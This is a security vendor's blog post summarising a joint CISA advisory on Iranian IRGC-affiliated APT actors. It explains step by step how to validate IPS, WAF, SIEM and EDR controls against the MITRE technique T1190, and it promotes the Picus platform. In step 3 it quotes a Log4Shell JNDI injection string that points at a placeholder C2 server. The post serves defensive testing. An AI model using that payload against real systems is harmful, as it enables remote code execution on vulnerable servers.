The CISA Recommended Method to Validate Security Controls

Keep up to date with latest blog posts

The U.S. Government's Cybersecurity and Infrastructure Security Agency (CISA) advised for the first time that organizations adopt automated security control validation to protect against advanced persistent threat (APT) actors in a Cybersecurity Advisory (Alert AA22-257A) on September 14th, 2022. This joint advisory, co-authored by cybersecurity authorities from the U.S. (CISA, NSA, USCC - CNMF, Treasury), Australia (ACSC), Canada (CCCS), and the United Kingdom (NCSC), spotlights ongoing malicious activity by APT actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) of the Iranian Government.

In this advisory, CISA and the authoring agencies are recommending 

  • continually testing your security program,
  • at scale,
  • in a production environment
  • against the threat behaviors mapped to the MITRE ATT&CK techniques

CISA and the authoring cybersecurity agencies emphasize that organizations should test and validate security controls to ensure the optimal performance of their security programs. In this blog, we explained how organizations could follow CISA's advice and validate their security controls step by step.

 Validate Your Security Controls against APT Actors with 14-Day Free Trial of Picus Platform

APT Actors Affiliated with IRGC

APT actors sponsored by the Iranian government and IRGC have been active since early 2021. Their cyber attack campaigns are often financially motivated and align politically with the Iranian government.
The IRGC-affiliated APT actors are infamous for exploiting known vulnerabilities in their cyber espionage and ransomware operations. In December 2021, the threat actors targeted a U.S. police department and transportation company with ransomware attacks. Later in February 2022, they exploited Log4j vulnerabilities and gained access to a U.S. aerospace company and a U.S. municipal government for data exfiltration from their networks. Although these techniques and vulnerabilities are known, many organizations have not patched them, and they still pose a risk to organizations. 

After initial access, they establish persistence by creating local and domain accounts masquerading as existing accounts. Then, threat actors exfiltrate data for espionage or encrypt data for ransom, depending on their objective.

Validate Security Controls Against APT Actors

In their advisory, the U.S. CISA gave examples of MITRE ATT&CK techniques used by IRGC-affiliated threat actors and recommended organizations validate their security controls against these techniques. Let's elaborate on how organizations can validate their security controls step by step.

1. Select an ATT&CK technique


The MITRE ATT&CK framework is a comprehensive knowledge base for known adversary tactics, techniques, and procedures (TTPs). APT actors utilize a series of adversary techniques to achieve their objectives. However, validating all techniques at once is not the most efficient way. As a commonly accepted industry best practice, the U.S. CISA recommends organizations assess their security controls against an ATT&CK techniques at a time and repeat the process for other techniques. Thus, organizations can continually address gaps in their security controls and have a lower chance of missing potential security gaps.

As an example, let's choose the "T1190 Exploit Public Facing Application" technique. IRGC-affiliated APT actors often use this technique to gain initial access to target networks.

2. Align your security technologies against the technique


In this step, first, you need to identify which security controls are expected to deal with the chosen adversary attack technique. Since we chose "T1190 Exploit Public Facing Application", we need to identify security controls that detect and/or prevent vulnerability exploitation attacks. For example, IPS, NGFW, and WAF are some network security technologies that can prevent Log4j exploitation attempts. Moreover, detection security controls like SIEM and EDR can detect Log4j exploitation.

After identification of the security controls against the chosen technique, you need to be sure that they are up and running. Then, you should check your access to management interfaces of these security controls to determine how they will respond to the upcoming tests.

3. Test your technologies against the technique


Now, it is time to test your security controls against the chosen technique. First, you need to design an adversary attack scenario. Threat actors may use multiple procedures, vulnerabilities, and tools to achieve an adversary technique.  When designing an adversary attack scenario focused on an ATT&CK technique, you need to identify procedures for the technique. Procedures are the adversary's specific implementation of a technique. For example, a procedure could be the IRGC-affiliated APT actors exploit the Log4Shell (Log4j CVE-2021-44228) vulnerability via the following JNDI request in the user agent header:

${jndi:ldap//<IP_address_of_C2_Server>/RCE}

The IRGC-affiliated APT actors abuse the multiple high-impact vulnerabilities to exploit the public-facing assets of their targets, such as Fortinet FortiOS vulnerabilities (CVE-2020-12812,  CVE-2019-5591, CVE-2018-13379), Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and Apache Log4j vulnerabilities in VMware Horizon (CVE-2021-44228 "Log4Shell", CVE-2021-45046, CVE-2021-45105).

The adversary scenario should include the exploitation of these vulnerabilities without harming the daily operations of the organization. Also, the procedures in the scenario should replicate APT actors' actions step-by-step to assess security controls thoroughly. After preparing the attack scenario, the next step is challenging your defensive security technologies against the attack scenario. Note that the IRGC-affiliated threat actors use multiple vulnerabilities with various procedures, so the execution of the adversary scenario may get complicated very quickly.

4. Analyze your detection and prevention technologies' performance


Once you have simulated an adversary attack scenario of an ATT&CK technique, you can figure out the performance of your detection and prevention technologies against the technique and identify gaps in your security controls.

For prevention technologies, you need to analyze whether the security control (e.g., IPS, NGFW, WAF) prevents the attack. For detection technologies (e.g., SIEM, EDR) performance, MITRE ATT&CK recommends focusing on the following gaps and measuring coverage: 

  • Logging gap: There are no logs relevant to attacks, so you are not currently pulling the required logs from the appropriate data sources.
  • Detection gap: Despite having the necessary logs, your detection technologies cannot detect the attack technique.

Therefore, in this step, security teams should investigate which logs and detection alerts are generated and which adversary actions are blocked by the security controls. If certain procedures in the adversary attack scenario were able to breach defenses, they should note these gaps to be mitigated in the last step.

5. Repeat the process for all security technologies

Once you have analyzed detection or prevention security controls, you need to repeat this process for all security technologies to obtain a set of comprehensive performance data about your security program.

6. Tune your security program

In the last step, you must mitigate the identified security gaps in steps 4 and 5 to improve your organization's security posture. For example, you need to identify the required log sources to collect required log data and fix the identified logging gaps. Then, you should write the required detection rules (analytics) or tune existing analytics to fix the detection gaps. Note that tuning your log data collection and designing detection rules are not trivial tasks.

In addition to security technologies, you need to consider people and processes when you are tuning your security program.

7. Repeat the Whole Process for Other ATT&CK Techniques

As an example, we run a security control validation process for the T1190 Exploit Public Facing Application technique used by IRGC-affiliated APT actors. It is highly recommended for organizations to repeat the whole process for other techniques utilized by the threat actor to ensure their security posture is solid against the threat actors. 

How Picus Helps Validating Security Controls Against APT Actors?

You can validate your security controls against all techniques used by the IRGC-affiliated  APT actor by running the adversary attack scenario Picus Complete Security Control Validation Platform. Not only for this APT actor, but you can also test your defenses against hundreds of attack scenarios such as HAFNIUM, Lazarus, APT29, and MuddyWater within minutes with a 14-day free trial of the Picus Platform. Picus also provides actionable mitigation content such as prevention signatures and detection analytics to tune your security program.

Picus Threat Library includes the following threats for IRGC-affiliated APT actors:

Threat ID

Action Name

Attack Module

36690

HomeLand Justice Threat Group Campaign 2022

Endpoint

48961

HomeLand Justice Threat Group Campaign Malware Download Threat

Network Infiltration

52959

HomeLand Justice Threat Group Campaign Email Threat

Email Infiltration (Phishing)

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof Picus Complete Security Control Validation Platform.

Subscribe

Keep up to date with latest blog posts